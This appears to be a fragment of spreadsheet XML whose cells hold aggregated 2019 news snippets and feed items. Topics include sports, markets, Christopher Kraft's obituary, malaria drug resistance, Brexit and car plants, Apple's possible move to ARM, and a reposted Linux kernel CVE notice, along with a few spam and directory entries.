    <t>NFL agent Blake Baratz lashed out at the Redskins on Tuesday after the team decided to make a somewhat surprising move: They cut their leading tackler from 2018, Mason Foster. From a personnel standpoint, the move wasn’t a total shocker and that’s because the Redskins had been looking to move on from Foster over the course of the offseason. According to NFL.com, the Redskins put Foster on the trading block in March, but decided to hold on to him after they weren’t able to find any takers. After Foster made it through the spring without being traded, it appeared that he was definitely going to be spending another season with the Redskins, but the team clearly had other plans. Of course, the reason this move is a surprise is because Foster was cut less than 24 hours before he</t>
  </si>
  <si>
    <t>Product Name: Snappyrush Click here to get Snappyrush at discounted price while it’s still available… All orders are protected by SSL encryption – the highest […] The post Snappyrush appeared first on Sell Me Something. Source link</t>
  </si>
  <si>
    <t>Earlier this month, SGX, “a full-service equities, fixed income, derivatives, commodities, and foreign currency exchange,” welcomed 1exchange, the country’s first licensed private securities exchange for accredited investors. According to Investopedia, SGX formed when the Singapore Stock Exchange, the Singapore International Monetary Exchange and Securities Clearing and Computer Services Pte merged in 1999. The 1X platform is built on the Ethereum mainnet, a “public blockchain” hosted on the Internet that allows for global trading of “tokenized assets” and 24-7 access to markets. As part of the launch, “Singapore-based boutique fund management company Aggregate Asset Management” listed its “AAM” token on 1X, which collectively represents, “over SGD 5.6 million worth of tradeable private equities representing approximately 5% of the company’s share equity.” SGX and 1X marked the occasion with, “a gong-striking ceremony held in conjunction with SGX’s Daily Securities Market Opening in SGX Centre.” The Monetary Authority of Singapore (MAS) also supports the growth of a private market ecosystem. MAS has also committed to allocate USD 5 billion of its own funds to invest in the private markets’ asset class. Choo Haiping, CEO of 1X, said, “1X is grateful for the support of our many stakeholders, including regulators, SGX, our partners in the financial industry, and the companies and investors who continue to believe in our mission to create a dynamic and vibrant private capital market through tradeable private equities.” The 1X (www.1x.exchange), will allow private companies to list up to 30% of their shares, “in the form of tradeable private equities.” Private stock exchanges allow firms to sell partial equity without having to undergo an IPO, which can be prohibitively expensive and not available to smaller-sized firms. David Kuo, CEO of the Motley Fool Singapore, and Robson Lee, a partner at law firm Gibson Dunn in Singapore told Channel News Asia that private stock exchange listings could be used to allow an accredited investor to own a piece of their favourite restaurant, for instance. Kuo and Lee also reportedly, “agreed that there is a fair amount of risk involved when investing on private stock exchanges.” According to Lee, “Such companies in a private stock market will not be subjected to the disclosure regime that applies to all publicly listed companies. For example, private firms on private exchanges do not have to submit quarterly financials. This lack of transparency can be very meaningful, said Lee: “They would not have safeguards like audit committees for example, which are imposed by the listing rules of a stock market. The lack of timely disclosure obligation could be a huge risk factor for investors who would want to enter into such investment transactions.” Kuo argued that the lack of disclosure is particularly risky when it comes to determining whether a startup is financially sustainable. “The statistics for startup companies is not really that great,” he said. “Nine out of ten of them will fail, so out of ten companies you might put money in, only one will succeed. If you like those kind of odds, then this kind of platform is probably good for you.” It should be noted that SGX Senior Vice President and Head of Equity Capital Markets, Mohamed Nasser Ismail, says his exchange “recognizes that companies in an earlier growth stage may need access to capital before they are ready for a public listing. (However) We supported 1exchange to create a virtuous ecosystem of capital flow catering to companies in the mid-late stages of growth.” The decision to list more mature companies may help mitigate risk at 1X. In a recent press release, 1X contends that Private Equity, or investing in private companies and assets, is a proven asset class with a long history of outperforming public markets. This difference becomes larger at longer investment periods. [1] (See Figure 1).”</t>
  </si>
  <si>
    <t>ANDY MURRAY has revealed his singles return is closer than he thought and suggested he could play the US Open. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>US President Donald Trump complained the Federal Reserve "probably will do very little" to counteract actions by Europe and China to ease monetary policy.</t>
  </si>
  <si>
    <t>Oil prices rose on Monday as the prospect of an expected interest rate cut by the U.S. Federal Reserve overshadowed pessimism over U.S.-China trade talks and oil demand fears stoked by forecasts for slower global economic growth.</t>
  </si>
  <si>
    <t>The father of one suspect says his son may want to die in a “blaze of glory”. The post Canada killings: Police says teen suspects may be hiding in woods appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A rate cut might be the right or wrong economic move. It will certainly drive financial markets even higher, which might well set up an almighty crash one day.</t>
  </si>
  <si>
    <t>Source: https://www.techspot.com/news/81204-over-100-million-playstation-4-consoles-have-now.html Over 100 million PlayStation 4 consoles have now been sold In the company’s latest earnings report, Sony reveals that 3.2 million PS4s were sold between March 31 and June 30. Add that to the 96.8 million total units sold that were reported back in April, and the 100-million milestone has been reached. Source: https://www.techspot.com/news/81204-over-100-million-playstation-4-consoles-have-now.html The post Over 100 million PlayStation 4 consoles have now been sold appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Tech companies drove another good day for the market on Monday.</t>
  </si>
  <si>
    <t>Newcastle owner Mike Ashley “doesn’t grasp top-level football and the requirements needed to be successful”, the club’s supporters trust has claimed. This post written by The Northern Echo | Newcastle originally appeared on The Northern Echo | Newcastle. Read the full post here. Source</t>
  </si>
  <si>
    <t>submitted by /u/Trigf [link] [comments] 2020 Toyota Supra owners may have to pay for Apple CarPlay one day</t>
  </si>
  <si>
    <t>Tamara de la Vega</t>
  </si>
  <si>
    <t>Construction work on King William Street will be stretched out for another year, and the start to the downtown streetscape will also be delayed by a year. Steve Hernen, Director of Operations and Protective Services for the municipality and Mark Misko, Director of Engineering and Transportation for the District of Muskoka delivered the news at Huntsville Council’s July 22 meeting. Work on King William Street will continue this fall and the contractor will return next spring to complete the project, said Hernen. “While that was going on, working with the District we’ve been out looking for the consulting engineering company to do the design work for Main Street, and of the four companies we’ve narrowed it down to, which we’re still in the interview process on, all four have identified our schedule as a problem,” said Hernen. “Too tight of timelines, and they’re concerned that if we keep pushing for a Main Street start next spring, we’ll run into the same problem, [it’s] going to become a two-year project.” Hernen said pushing improvements to the Main Street to 2021 will also give staff additional time to pursue funding opportunities related to climate change and storm sewers as well as accessibility, while also providing better timelines for the engineering companies bidding on the project. “Now if we agree to move it back one year, we’re not going to take the foot off the gas. We’re still hoping to have a consulting engineer in place by September 1 at the latest… if we continue to want to try to push this through to next year, [it]means that we have to have the drawings and the engineering and the planning all done by January of this year to try and get to tender, we’re just not going to make those dates. We’re going to end up in another King William [scenario], which started construction in the middle of summertime and it’ll carry through to the next year,” said Hernen. “This timeline allows a bit more consultation and a bit more design time, which we feel would significantly reduce any risks…” added Misko. Huntsville Mayor Scott Aitchison said from a personal perspective he’s fine with pushing the Main Street work back another year but regretted having to extend the King William project. I think I’m fine with the notion of the Main Street section being pushed back an extra year. I think that that certainly buys the downtown merchants a little extra time to prepare for what’s going to be a mess and destruction… but it is a little frustrating that King William Street is now going to be stretched out over two years, which means our downtown main artery is going to be a disaster for three years, not two years.Huntsville Mayor Scott Aitchison Aitchison asked why it had been stretched out for another year and asked what is being done to complete the project as quickly as possible. Misko said the project got a late start and the volume is significant. “We didn’t want to work all the way into winter. We’d like to push the season as late as we can but there is recognition that we don’t want to work in frosted up conditions, we want to wait until frost is out of the ground before we finish it,” he said. “So [I] agree it does create a bit more of an inconvenience for that longer timeline.” Aitchison pushed on the delay to the King William project. “So was the tender issued late?” he questioned. “The tendering and the award met the timelines. We did push them as quickly as we could. The project was initiated essentially late last summer and into the fall, and by the time we got through the design stages… we crunched it as much as we could to get to break ground and that’s when Steve said we don’t want to let up on the gas on this one [Main Street]. There’s a recognition that this has significantly more moving pieces with the streetscaping and everything like that,” said Misko. Prompted by a question from Councillor Jonathan Wiebe, Misko confirmed that the plan is to have the King William project completed before the summer season next year, and work on the Main Street would not begin until the following summer, so there will be a bit of downtime, he said. Councillor Dan Armour asked if the left-turning lane could be extended at the street lights between King William and Chaffey streets. “Today when they had the pylons out, there’s only room for two vehicles there and there’s a lot of cars turning and backing traffic up quite a ways.” Hernen said other options are being looked at with the contractor to keep the traffic flowing through that area. Don’t miss out on Doppler! Sign up for our free newsletter here. Like The post King William Street construction not expected to be completed until next spring appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>Christopher C. Kraft Jr., the legendary founder of NASA’s mission control, who directed America’s first piloted orbital flights, oversaw the Apollo 11 lunar landing and was director of the Johnson Space Center in Houston, died on Monday in Houston, two days after the 50th anniversary of that historic moment on the moon. He was 95. NASA announced the death. For 25 years, from the dawn of the space age in the 1950s to the threshold of almost routine launchings in the 1980s, Mr. Kraft played crucial roles in the space program. He devised the protocols for exploration beyond the Earth’s atmosphere, orchestrated early orbital missions and spacewalks, and developed projects that put astronauts on the moon and into the first reusable space shuttles. Aside from the astronauts who made history — including Alan B. Shepard Jr., with his suborbital flight; John Glenn, in orbiting the Earth; and Neil Armstrong and Buzz Aldrin, the first to land on the lunar surface — Mr. Kraft was the most familiar face of the National Aeronautics and Space Administration’s early years, the steady ground commander who often explained missions to a rapt world at news conferences. In an era of perilous experiments hastened by the Soviet success of Sputnik, the first artificial satellite, Mr. Kraft presided over triumphal breakthroughs in the Mercury, Gemini and Apollo projects. He also stood by helplessly when a fire killed three astronauts on a launchpad in 1967, but he helped devise the ingenious plan that saved the Apollo 13 crew after an explosion crippled their spacecraft en route to the moon in 1970. At a time when there were no rules or procedures for space travel, Mr. Kraft, a brilliant aeronautical engineer, virtually wrote the book for NASA. He originated the concept of mission control, with authority vested in a ground-based flight director, not in a pilot-astronaut soaring through space at 7 miles a second who might be overwhelmed by pressures, especially during launch or re-entry. Mr. Kraft also developed the templates for a generation of space exploration: global tracking and communications networks; instruments to monitor the condition of astronauts; spacecraft propulsion and operating systems; flight plans; emergency procedures; techniques for splashdowns and recoveries at sea; even programs to train and coordinate the work of thousands of ground personnel. His plans for each mission were thicker than the New York telephone books of those days. Appearing before hundreds of reporters as NASA’s spokesman in the early missions, first at Cape Canaveral, Fla., and later in Houston, he seemed a mild-mannered, soft-spoken technocrat. But in the windowless mission control room, he became a blunt taskmaster, demanding obedience and precision from subordinates and astronauts. Wearing headphones, chewing a cigar, seated in a swivel chair at the flight director’s console surrounded by engineers at their computers and 17 projection screens, he coolly absorbed avalanches of incoming data and made tough “go, no-go” decisions during launch countdowns, at separation points of multistage rocket ascents and at other critical times in a flight. During his NASA years, he never saw a rocket lift off, except on television monitors. Nor did he usually address his astronauts. A “capsule communicator” relayed his instructions, although he went on the air to give emphasis to his orders, to intervene in emergencies and to banter away tensions. His voice conveyed unshakable confidence, though a flight surgeon during one liftoff measured his pulse at 135 beats a minute. Some astronauts chafed under his commands. In one contretemps, Mr. Kraft regarded Scott Carpenter, one of America’s original astronauts, as insubordinate on a Mercury flight and grounded him permanently. While his relationship with the astronauts was not always smooth, he was adamant about who was in charge. “The guy on the ground ultimately controls the mission,” Mr. Kraft told The New York Times Magazine in 1965. “There’s no question about that in my mind or in the astronauts’ minds. They are going to do what he says.” Mr. Kraft directed all six piloted missions of Project Mercury, which made Shepard the nation’s first person in space in 1961 and put Glenn into orbit in 1962. He also directed portions of the longer-duration, two-astronaut Gemini missions of 1965-66. These included the first rendezvous of two spacecraft and the first spacewalk, with Edward White floating above the United States, giving mesmerizing descriptions of the Earth below. Gemini proved that astronauts could remain in space for the time it would take to get to the moon and back. As NASA turned to the later Gemini flights and the lunar-landing missions of the late 1960s, Mr. Kraft stepped back from direct control of flights and took broader roles in planning and managing Project Apollo, including the selection and mentoring of his successors in flight control. By then, he was a household name to Americans, and his habit of lighting a cigar amid jubilant cheers and applause at moments of triumph in mission control had become a familiar portrait on television and in newspapers and magazines, a symbol of swelling national pride in outdistancing the Soviet Union. In 1965, Mr. Kraft was on the cover of Time magazine, profiled as the “Conductor in a Command Post.” He drew the comparison himself: “The conductor can’t play all the instruments — he may not even be able to play any one of them. But he knows when the first violin should be playing, and he knows when the trumpets should be loud or soft, and when the drummer should be drumming. He mixes all this up and out comes the music. That’s what we do here.” With his protégés Glynn Lunney and Eugene Kranz in charge of flight controls, Mr. Kraft became director of flight operations, with overall responsibility for the dress rehearsals of Apollo 7, 8, 9 and 10; for the historic Apollo 11 moon landing on July 20, 1969; and for Apollo 12, a moon landing four months later. The 50th anniversary of the first lunar landing has been widely celebrated with a host of commemorative events, including television documentaries. At the climax of Apollo 11’s descent to the lunar surface, Mr. Kraft was in mission control and conferred urgently with Mr. Kranz when, minutes before the scheduled landing, computer alarms rang out, threatening disaster. The world knew nothing about it until Mr. Kraft disclosed the event days later, and credited the Kranz team with resolving it. “The computer was right on the ragged edge,” he said. Asked if the team had been worried, he snapped, “You’re damn right we were.” Four more Apollo missions put astronauts on the moon, but Mr. Kraft was less directly involved. He became deputy director of the Manned Spacecraft Center in Houston in 1969. However, when Apollo 13 was crippled by an explosion en route to the moon, Mr. Kranz called him in to mission control. Mr. Kraft chaired a meeting of senior managers, who devised a rescue plan that used the lunar excursion module as a “lifeboat” to save the crew, as dramatized in the 1995 film “Apollo 13.” In 1972, Mr. Kraft was named director of the spacecraft center — renamed the Johnson Space Center in 1973 — and held the post for a decade until his retirement in 1982. Besides overseeing the remaining Apollo missions, he played roles in the success of the first crewed space station, Skylab; the first international space docking; the Apollo-Soyuz test project; and the first space shuttle flights. The shuttle Columbia flew a nearly flawless first mission in April 1981, circling the world 36 times and landing in California. But its second flight seven months later had to be curtailed to two days from five after fuel-cell problems arose. It was “the prudent thing to do,” said Mr. Kraft, who did not light a cigar. Christopher Columbus Kraft Jr. was born in Phoebus, in Eastern Virginia, on Feb. 28, 1924, to Christopher and Vanda (Suddreth) Kraft. His father, a hospital finance officer, had been born just before the 400th anniversary of Columbus’s arrival in the New World: thus the name. Later, many would consider it appropriate for the son. Christopher Jr. was a fine baseball player and dreamed of becoming a pro. After high school graduation in 1941, he enrolled at Virginia Polytechnic Institute. With the outbreak of World War II, he tried to enlist in the Navy but was rejected because of a childhood hand injury. He graduated in 1944 with a bachelor’s degree in aeronautical engineering. The next year he joined what is now known as the Langley Research Center, of the National Advisory Committee for Aeronautics. It was on the cutting edge of aeronautical research, using wind tunnels to test aircraft designs and working on the X-1 experimental rocket. In 1950, he married Elizabeth Anne Turnbull. They lived in Houston and had two children, Gordon and Kristi Anne. Complete information on his survivors was not immediately available. At Langley for 13 years, Mr. Kraft distinguished himself by solving complex flight problems and directing the work of test pilots. He also met future leaders of America’s space program, particularly Robert R. Gilruth, who became his mentor and the first director of the Manned Spacecraft Center. After Sputnik opened the space race, President Dwight D. Eisenhower established the National Aeronautics and Space Administration in 1958. Langley research personnel became the core of its Space Task Group, charged with putting Americans into space, and Mr. Gilruth assigned Mr. Kraft to Project Mercury. In retirement, Mr. Kraft became a consultant to Rockwell International and IBM. His memoir, “Flight: My Life in Mission Control,” was published in 2001 and became a best seller. In 2011, NASA named the mission control center in Houston after him. Michael Coats, then the director of the Johnson Space Center, called Mr. Kraft’s life a testament to his dream of space exploration: “He is a space pioneer without whom we’d never have heard those historic words on the surface of the moon: ‘Houston. Tranquillity Base here. The Eagle has landed.’ Those words effectively put Houston, and this building behind us, on the intergalactic map forever.” Source link</t>
  </si>
  <si>
    <t>James Simpson</t>
  </si>
  <si>
    <t>A Dundee parcel depot is offering loans to employees after claims staff were left out of pocket with changes to their payments.</t>
  </si>
  <si>
    <t>The S&amp;P 500 and Nasdaq approached record highs overnight, lifted by a strong earnings from Coca-Cola and optimism for a trade war resolution.</t>
  </si>
  <si>
    <t>The Democratic head of the U.S. House Ways and Means Committee on Friday called for "good faith" negotiations with the Trump administration to address concerns about the new U.S.-Mexico-Canada trade agreement and pave the way for its passage.</t>
  </si>
  <si>
    <t>Ozgameshop weekly special offers is up for this week and there are few good deals other games that worth mentioning is Just Cause 4 for $34.99 for both Ps4 and Xbox One and Red Dead Redemption 2 for Xbox One $52.99. Shipping is free on all orders above $50 and don't forget to use cashrewards for 1.4% back 3.5% for new members.</t>
  </si>
  <si>
    <t>Image copyright Getty Images Malaria parasites resistant to key drugs have spread rapidly in South East Asia, researchers from the UK and Thailand say. The parasites have moved from Cambodia to Laos, Thailand and Vietnam, where half of patients are not being cured by first-choice drugs. Researchers say the findings raise the “terrifying prospect” drug-resistance could spread to Africa. However, experts said the implications may not be as severe as first thought. What is happening? Malaria is treated with a combination of two drugs – artemisinin and piperaquine. The drug combo was introduced in Cambodia in 2008. But by 2013, the first cases of the parasite mutating and developing resistance to both drugs were detected, in western parts of the country. The latest study, published in the Lancet Infectious Diseases, analysed blood samples from patients across South East Asia. Inspecting the parasite’s DNA showed resistance had spread across Cambodia and was also in Laos, Thailand and Vietnam. It had also picked up further mutations, making it even more problematic. In some regions, 80% of malaria parasites were drug resistant. “This strain has spread and has become worse,” Dr Roberto Amato, from the Wellcome Sanger Institute, told BBC News. Does this mean the disease is becoming untreatable? No. A second study, published in the same journal, showed half of patients were not being cured with standard therapy. However, there are alternative drugs that can be used instead. “With the spread and intensification of resistance, our findings highlight the urgent need to adopt alternative first-line treatments”, Prof Tran Tinh Hien, from the Oxford University Clinical Research Unit, in Vietnam, said. That could include using different drugs alongside artemisinin or using a combination of three drugs to overcome resistance. What’s the concern? Huge progress has been made towards eliminating malaria. However, the development of drug resistance threatens that progress. The other issue is if the resistance spreads further and reaches Africa, where more than nine in 10 cases of the disease are. “This highly successful resistant parasite strain is capable of invading new territories and acquiring new genetic properties, raising the terrifying prospect that it could spread to Africa, where most malaria cases occur, as resistance to chloroquine did in the 1980s, contributing to millions of deaths,” Prof Olivo Miotto, from the Wellcome Sanger Institute and University of Oxford, said. What does this change for people living there? The findings will not change much in people’s day-to-day life in the Greater Mekong Subregion, in South East Asia. Tackling malaria is about more than just picking the right treatment after an infection. All the efforts around controlling the mosquitoes that spread the disease will not change. However, the researchers say the drugs people are given after an infection should change. The studies also show genetic analysis of malaria parasites can help doctors keep one step ahead of emerging drug-resistance in order to give patients the right treatment. Is this the whole picture? The spread of resistance is set against the backdrop of falling cases in the region. “These parasites are scary beasts, there’s no doubt,” Prof Colin Sutherland, from the London School of Hygiene and Tropical Medicine, said. “However, I wonder if these parasites are not very fit because the population as a whole is crashing.” In Cambodia there were: 262,000 cases of malaria in 2008 36,900 cases of malaria in 2018 So, while the drug-resistant parasite has undoubtedly spread, it is not necessarily a global threat, according to Prof Sutherland. “The implications are not as severe as we might think,” he said. How bad is malaria? There are about 219 million cases of malaria around the world each year. Symptoms include cycles of feeling cold and shivering followed by a high temperature with severe sweating. Without treatment, the parasite can lead to breathing problems and organ failure. NHS: Malaria The disease kills about 435,000 people every year – most of them are children under the age of five. Follow James on Twitter.</t>
  </si>
  <si>
    <t>Caitlyn Rintoul and Mitch Mott</t>
  </si>
  <si>
    <t>A Perth man and woman were in a stable condition in hospital last night after their plane flipped, trapping them inside, while landing at a remote airport in South Australia.</t>
  </si>
  <si>
    <t>http://www.olympicholidays.com/malta/st-julians/intercontinental-hotel/q.sp.6501.q.html The post Intercontinental Hotel in St Julian's, Malta – www.OlympicHolidays.com appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Fran Rimrod</t>
  </si>
  <si>
    <t>WA’s economy is still the second worst in the country, coming in seventh just before the Northern Territory, CommSec's latest State of the States report has revealed.</t>
  </si>
  <si>
    <t>Joanna Menagh</t>
  </si>
  <si>
    <t>A man trained in using knives to inflict fatal injuries in humans smuggled a weapon into a Perth courthouse complex and deliberately fatally stabbed his former partner during a meeting about money, a WA court is told.</t>
  </si>
  <si>
    <t>Actor stars in a film about a real-life neo-Nazi who abandoned the white supremacist and became an informant for the FBI See full article at Independent.co.uk » The post Jamie Bell says he was ‘very scared’ about role as real-life neo-Nazi in Skin appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>The Wallabies' build-up to the World Cup continues as they take on Argentina in The Rugby Championship Test in Brisbane. Follow the live score and stats from Lang Park.</t>
  </si>
  <si>
    <t>Wie am Meer … #wohnwand # landhaus #vintage #wohnzimmer The post Wohnwand “Kiruna III” 4tlg. Set, Vitrine, Lowboard, Highboard, Wandboard, Pinie weiß, 357x170x38-45 – Christiane appeared first on Mix.Fitnessandgym.</t>
  </si>
  <si>
    <t>Chaparral is taking wakesurfing to new heights! View our new Chaparral Surf Series with Surf Gate™ technology in action. source The post New Chaparral Surf Series! appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>● Follow our Bass House Playlist: http://ukf.io/BassHousePlaylist ● Download/Stream: https://pilot.lnk.to/BriRevisited We revisit Fox Stevenson's Bruises a year on from release with two fresh remixes from Curbi &amp; Macky Gee! Curbi Like → https://www.facebook.com/CurbiOfficial Follow → https://twitter.com/CurbiOfficial Listen → https://soundcloud.com/curbiofficial Instagram → https://www.instagram.com/curbi/ Fox Stevenson Like → https://www.facebook.com/FoxStevensonMusic Follow → https://twitter.com/FoxStevensonNow Listen → https://soundcloud.com/foxstevenson Instagram → […] The post Fox Stevenson – Bruises (Curbi Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Prime Minister Narendra Modi's Hindu nationalist administration has been pushing to criminalise "triple talaq", under which a man can divorce by uttering the word "talaq", meaning divorce in Arabic, three times in his wife's presence.</t>
  </si>
  <si>
    <t>Vauxhall owner could move Astra production ‘from UK’ Original Source Image copyright Getty Images The chief executive of Vauxhall-owner PSA says it could move all production from its Ellesmere Port factory if Brexit makes it unprofitable. Carlos Tavares told the Financial Times that the firm has alternatives to the plant which it could use. The move would probably lead to the closure of the site, the FT said, threatening 1,000 jobs. That would leave Vauxhall’s Luton-based van plant as its last presence in the UK. “Frankly I would prefer to put it [the Astra car] in Ellesmere Port but if the conditions are bad and I cannot make it profitable then I have to protect the rest of the company and I will not do it,” Mr Tavares told the paper.”We have an alternative to Ellesmere Port.” The government is now “working on the assumption” of a no-deal Brexit, said Michael Gove, who has been charged by Prime Minister Boris Johnson to prepare for leaving the EU with no deal. Mr Gove said his team still aimed to come to an agreement with Brussels but, writing in the Sunday Times, he added: “No deal is now a very real prospect.” ‘Not an option’ The Confederation of British Industry has warned the government that neither the UK or EU is ready for a no-deal Brexit. And the car industry lobby group, the Society of Motor Manufacturers and Traders warned on Friday that “No deal Brexit is simply not an option.” Vauxhall did not immediately respond to a request for comment from the BBC. Car production has been falling in the UK over the past year, amid increasing pleas from the industry for a Brexit deal. The UK’s automotive industry has received a series of blows in recent months, with Honda announcing it will close its Swindon plant in 2021. Ford also said its Bridgend engine plant in south Wales would close in September 2020 with the loss of 1,700 jobs. Japanese car producers, including Nissan, have said that Brexit uncertainty is not helping them “plan for the future”. Earlier this year, Nissan opted to build the next X-Trail model in Japan, rather than in Sunderland. Follow us on Twitter Original Source The post Vauxhall owner could move Astra production ‘from UK’. appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Fed set to cut key rate for the first time since the Great Recession The post 3 things to watch for from the Federal Reserve on Wednesday appeared first on Advisor.</t>
  </si>
  <si>
    <t>Movie coming in November in the US and in December in the UK See full article at Independent.co.uk » The post A Beautiful Day in the Neighborhood: Trailer reveals first look at Tom Hanks as Fred Rogers appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>In a statement, the military said five soldiers were among those killed in the plane crash. Rescue officials said the death toll could rise further since there are injured in critical condition.</t>
  </si>
  <si>
    <t>Laptop LifeStyle Review</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V My No.1 Recommended Method to Start a Real Online Business generating passive multiple streams of income … source</t>
  </si>
  <si>
    <t>Jessica Moran</t>
  </si>
  <si>
    <t>An inquest into the death of a 48-year-old man who was shot dead by police in 2016 during a violent confrontation hears he was throwing knives at them when they arrived at his north-west Tasmanian property.</t>
  </si>
  <si>
    <t>THE chairperson of the Zimbabwe Electoral Commission (Zec), Justice Priscilla Chigumba, has said the appointment of Mr Utoile Silaigwana as the commission’s chief elections officer is above board and the country’s electoral management body is committed to inclusive electoral reforms. In a statement yesterday, Justice Chigumba said Mr Silaigwana has 17 years in election management systems and</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/GuyK7YXETdA/295703-apple-could-switch-to-arm-but-replacing-xeon-is-no-simple-endeavor Apple Could Switch to ARM, But Replacing Xeon Is No Simple Endeavor The question of when Apple will switch to building its own custom ARM CPU cores for its software ecosystem rather than using Intel and x86 comes up on a regular basis. On ET, we first covered the topic in 2011, and I’ve hit it several times in the intervening years. My answer has typically been some flavor of “theoretically yes, but practically (and in terms of the near future), no.” A recent AppleInsider article does a good job of rounding up the reasons why Apple really might be taking this step soon. We’ve previously heard rumors that the company could launch such a product in 2020, and while rumors are not the same thing as a definite launch date, the piece is solid. It makes a reasonable case for why Apple may indeed take this step and references various real-world events, including Intel’s difficulties moving on past 14nm, Apple’s design efforts around GPUs and CPUs, the increasing complexity and capability of its SoCs, and the fact that Apple has built its own secondary chips, like the T2 controller. All of these points are true, and it’s why I think the 2020 rumor deserves to be taken more seriously than the dates and ideas that we used to hear. But there is still a major piece of this puzzle that doesn’t get talked about often enough. Apple can introduce an ARM core running full macOS, but if it wants to replace x86 in its highest-end iMac Pro and Mac Pro products, it’s going to have to take on some significant design challenges that it hasn’t faced before. Intel’s Skylake mesh interconnect. This is anything but easy to build and design. Apple has built CPUs, yes. But it’s never tried to build, say, a 28-32-core ARM processor in a multi-socket system. To the best of my knowledge, Apple has never built a server-class chipset or designed a CPU socket for its own product families. During E3, I attended an AMD session on the evolution of its AM4 socket, and how carefully AMD had to work in order to design a 7nm product with chiplets to fit into a socket that initially deployed four identical CPU cores in a 28nm process node. Even if Apple intends to create a platform without upgradable CPUs, it will need to design its own motherboards. The socket design decisions that it makes will impact how quickly it can iterate the platform and how much work has to be done at a later time. Achievable? Absolutely. But not something one does overnight. The routing on AMD Ryzen 7 3000 PCB. That’s the connection between one chiplet and its I/O die. This isn’t easy to design, either. Using chiplets makes some aspects of CPU design easier, especially on leading-edge nodes, but it doesn’t simplify everything. Chiplets require interconnects, like AMD’s Infinity Fabric. Apple would need to design its own solution (there are no formal chiplet interconnect standards yet). There’s a lot of custom IP work to be done here if Apple wants to bring a part to market to replace what Intel offers in the Mac Pro. One simple solution is for Apple to launch new ARM chips in laptops but keep desktop systems on Intel for the time being. In theory, this works fine, provided the ecosystem is ready for it and Apple can deliver appropriate binaries for applications. Software application support and user expectations could be tricky to manage here, but it’s doable. The problems for Apple, in this case, are making sure that its consumers understand any compatibility issues that might exist and that the new ARM-based products are clearly differentiated from the old x86 ones. Is There a Reason for Apple Not to Build Its Own Mac CPUs? There is, in fact, a reason for Apple not to build its own CPU cores for Mac. There is a non-trivial amount of work that must be done to launch a laptop/desktop processor line. Doing all of the work of developing interconnects, chiplets, chipsets, and motherboards from the ground up is more difficult and expensive than working with someone else’s pre-defined product standard and manufacturing. There’s an awful lot of work that Intel does on Core that Apple doesn’t have to do. The question of whether it makes sense for Apple to move away from Intel CPUs is therefore partially predicated on what kind of money Apple thinks it can make as a result of doing so. Obviously capturing the value of the microprocessor can sweeten the cost structure, but capturing the value also means capturing the cost. When Apple was a non-x86 shop, its market share was significantly smaller than it is today, and the company gained some market share immediately after switching to x86. It is impossible to tell if it gained that share because its software compatibility was now much improved or because many of its systems, especially laptops, were now far more competitive with their Windows counterparts. Apple has to consider that it will lose at least some customers if it moves away from x86 compatibility again, either because of software compatibility or because its new chips may not offer a performance improvement in specific workloads relative to Intel. The most valuable CPUs — the ones powering the Mac Pro — are also the most expensive to design and build. If Apple doesn’t think it can command the price premiums that Xeon does, it might hold off on introducing CPUs in these segments until it believes it can. Unlike 2005, when IBM couldn’t produce a G5 that fit into a laptop, Apple isn’t quite that pinched as far as market segments. I think Apple’s CPUs have evolved enough to make a jump towards ARM and away from x86 plausible in a way it wasn’t back in 2014, but there are still some significant questions to be answered about where Apple would sell the part and whether it would attempt to replace x86 in all products, or in specific mobile SKUs. And, honestly, I think there’s a version of this story where Apple ultimately continues to work with Intel or AMD long into the future, having decidedly to deploy its own ARM IP strategically across the Mac line, or in secondary positions similar to how the T2 chip is used. Now Read: Analyst: Apple Will Switch Away From Intel in 2020 Apple May Ditch Its Hated Butterfly Keyboards Later This Year Apple Cuts MacBook Air Prices, Updates MBP, and Kills off the MacBook Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/GuyK7YXETdA/295703-apple-could-switch-to-arm-but-replacing-xeon-is-no-simple-endeavor The post Apple Could Switch to ARM, But Replacing Xeon Is No Simple Endeavor appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Newcastle United took on Hibs at Easter Road looking to build towards the start of the season This post written by Lee Ryder originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>In the Linux kernel before 3.4, a buffer overflow occurs in drivers/net/wireless/iwlwifi/iwl-agn-sta.c, which will cause at least memory corruption. Published at: July 27, 2019 at 11:15PM View on NVD website The post New vulnerability on the NVD: CVE-2012-6712 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Grover Dental Centre – 202 -46 Carry Dr SE # 202, Medicine Hat, Alberta T1B 4E1 – Rated 4.6 based on 13 Reviews "Excellent dentist, properly and well run. Jump to Sections of this. Crestwood Dental Clinic, Medicine Hat, Alberta. 952 likes. We’re a highly diversified group of dentists offering a unique combination of long-term. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Galvin Dental, Park Meadows Dental Top Dental Clinic In Medicine Hat The addition of winter softball clinics by Lethbridge Minor. hosts — and favourites to win — Medicine Hat, with the Heat. Cosmetic Dentist In Medicine Hat Alberta Viva Vitality: How dental sealants can help those areas brushing and flossing can’t get to – Alberta Child Health Benefits is for families with limited income that may SouthSide Dental – Medicine Hat dental services SouthSide Dental – Medicine Hat dental services Admin Home About Services Sedation &amp; Anesthesia Crowns Dental Implants Dental Service-Fillings Exams Hygiene Nitrous Oxide. Dental Hygiene – Medicine Hat College Denture Care Ltd. 3341 – Dunmore Rd SE 403-527-7900 Finesse Dental Hygiene Clinic #104, 1310 – Kingsway Ave SE 403-526-5506 Gaslight Dental Health 